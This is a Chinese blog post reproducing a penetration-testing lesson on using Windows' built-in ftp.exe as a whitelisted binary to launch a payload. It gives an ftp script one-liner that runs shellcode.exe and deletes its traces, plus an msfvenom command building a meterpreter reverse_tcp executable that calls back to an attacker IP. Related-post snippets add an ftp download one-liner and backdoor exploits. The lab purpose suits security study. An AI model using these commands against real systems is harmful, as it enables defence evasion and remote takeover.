对亮神基于白名单ftp执行payload第十九季复现

最新推荐文章于 2023-11-23 18:30:47 发布
最新推荐文章于 2023-11-23 18:30:47 发布
阅读量308 收藏
点赞数
分类专栏: 亮神文章复现 文章标签: msf 白名单
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/89892641
版权

0x00 Ftp.exe简介:

Ftp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。

0x01 环境

攻击机 kali 192.168.5.102
靶机 win7 192.168.5.101
装有av

0x02复现

攻击机,注意配置set AutoRunScript migrate f
在这里插入图片描述
靶机echo !C:\Users\administrator\Desktop\shellcode.exe > o &echo quit >> o &ftp ‐n ‐s:o &del /F /Q o
在这里插入图片描述
弹回
在这里插入图片描述

0x03 shellcode.exe

在这里插入图片描述

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=10129 -f exe > shellcode.exe

0x04 总结

不过av

0x05借鉴

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/88_基于白名单Ftp.exe执行payload第十九季.html

cxk331
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第八十八课:基于白名单Ftp.exe执行payload第十九.pdf
05-09
第八十八课:基于白名单Ftp.exe执行payload第十九.pdf
渗透测试=基于白名单执行payload--Ftp
weixin_30292745的博客
04-25 111
还是自己动手复现课程的过程。 环境 靶机win7 攻击机 kali Ftp.exe简介: Ftp.exe是Windows本身自带的一个程序,属于微软TP工具,提供基本的FTP访问 说明:Ftp.exe所在路径已被系统添加PATH环境 Windows 2003 默认位置: C:\Windows\System32\ftp.exe ...
记录今日学习--FTP嗅探与简易制作Payload
weixin_44515089的博客
02-26 316
FTP暴力破解密码 首先建立账户,使用 net user username password /add 建立用户 然后 net localgroup administrators username /add 将用户加入管理员组 在FTP站点中加入新建立的用户,允许其远程登陆—服务器准备工作配置完毕 在kali中下载medusa // 使用 sudo apt-get insta...
asp 执行 exe_利用msbuild白名单执行绕安全防护程序提权
weixin_39640773的博客
11-21 293
0x00 前言平常我们在做渗透测试的过程总能遇到各种奇奇怪怪的问题,比如命令跑不起来,再比如在一定权限下加账号的时候被安全防护程序给阻止等问题,笔者这个案例就是讲的在安装了各种防护程序的情形下的一次突破(文章之前发布到其他平台,可能有些人已经看过了),看官们多担待。0x01 前期的信息刺探**首先拿到webshell,发现phpshell只能访问shell所在目录,连网站根目录都跨不过去...
ftp2.3.4(笑脸漏洞复现)以及安装过程
最新发布
shurongyugong的博客
11-23 1096
遇到"/usr/bin/ld: 找不到 -lcap"错误,安装 libcap 库及其开发工具。cp RedHat/vsftpd.pam /etc/pam.d/ftp #PAM 认证。扫描目标ip,查看是否存在漏洞,出现以下这些就代表存在。nmap -script=vuln -p 21 目标IP。#检查依赖关系,这将确保安装了构建和编译工具。进行编译安装,出现以下这些东西,说明安装成功。将local_enable改为YES。将listen改为yes。查看是否启动,出现两个。目录下,并赋予执行权限。
第八十课:基于白名单Wmic执行payload第十.docx
09-15
第八十课:基于白名单Wmic执行payload第十.docx
第八十八课:基于白名单Ftp.exe执行payload第十九.docx
09-15
第八十八课:基于白名单Ftp.exe执行payload第十九.docx
第七十九课:基于白名单Regsvr32执行payload第九1
08-03
第七十九课:基于白名单Regsvr32执行payload第九1
第八十四课:基于白名单Forfiles执行payload第十四.docx
09-15
第八十四课:基于白名单Forfiles执行payload第十四.docx
vsftpd 2.3.4 带漏洞版本 可复现
09-26
vsftpd 2.3.4 带笑脸漏洞版本 可复现
bat执行有双引号的命令行_免杀技巧执行系统命令方式总结
weixin_33917277的博客
12-28 690
“在渗透测试中,常常会遇到这种情况,上传一个shell上去,连上,却发现无法调用cmd.exe无法执行系统命令,这时候你往往想着,上传一个自己的cmd.exe上去,这是一套行云流水的操作,但把环境条件在变得苛刻一点,杀毒软件将监视二进制文件,例如cmd.exe,那么你会怎么做才能逃避检测?那么接下来就会介绍一些免杀思路。”01背景Windows系统提供了多个二进制文件,可以使用它们执...
渗透测试技巧分享
cnbird's blog
03-21 1030
http://www.freebuf.com/articles/system/7331.html 1.AT時提示綁定句柄無效 經常碰到的這個問題,百度搜索的全部都沒一個能解決的。 正確的解決辦法是先在地址欄\\1.1.1.1 得到對方機器名,例如ADMINPC,然後,CMD echo 1.1.1.1 ADMINPC >>C:\windows\system32\drivers\etc\h
FTP后门漏洞复现(含有漏洞的vsftpd2.3.4)
顾蒅' Home
09-12 7122
FTP后门漏洞复现 0x01 漏洞简述 vsftpd-2.3.4 手工触发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 0x02 风险等级 漏洞评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 FTP是文件传输协议(File Transfer Protocol)的缩写,是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输
对亮基于白名单Wmic 执行 payload 第十复现
cxk
05-03 429
0x01 Wmic简介: WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之...
对亮基于白名单 Compiler.Exe 执行 Payload 第六复现
cxk
05-03 497
0x00 Compiler.Exe简介 Microsoft.Workflow.Comiler.exe是.NET Framework默认自带的一个实用工具,用户能够以XOML工作流文件的形式提供一个序列化工作流来执行任意未签名的代码。 0x01 环境 攻击机kali 192.168.5.99 靶机win7 192.168.5.112 靶机装有数字AV 0x02 复现 A 攻击机配置监听 靶机执行 ...
对亮基于白名单 Cmstp.exe 执行 payload 第十六复现
cxk
05-06 264
待补充…
VsFtp2 Version 2.3.4后门漏洞
weixin_34143774的博客
04-06 934
Metasploit+Nmap的使用 测试搭建虚拟机 nmap –sT –A (IP address) 或者使用metaspliot 的扫描 以ftp –version 来扫描 #这里使用别人的图 metasploit 漏洞利用 use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsf...
ftp一句話download
weixin_33835103的博客
11-08 144
echo open 10.0.0.1 > o&echo user 1 1 >> o &echo get 3389.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o 本文转hackf...
ysoserial 详细payload执行手册
06-11
ysoserial是一款Java反序列化利用工具,可以用于生成各种反序列化payload,下面是使用ysoserial生成payload的详细步骤: 1. 下载ysoserial工具,可以从https://github.com/frohoff/ysoserial下载。 2. 确认目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值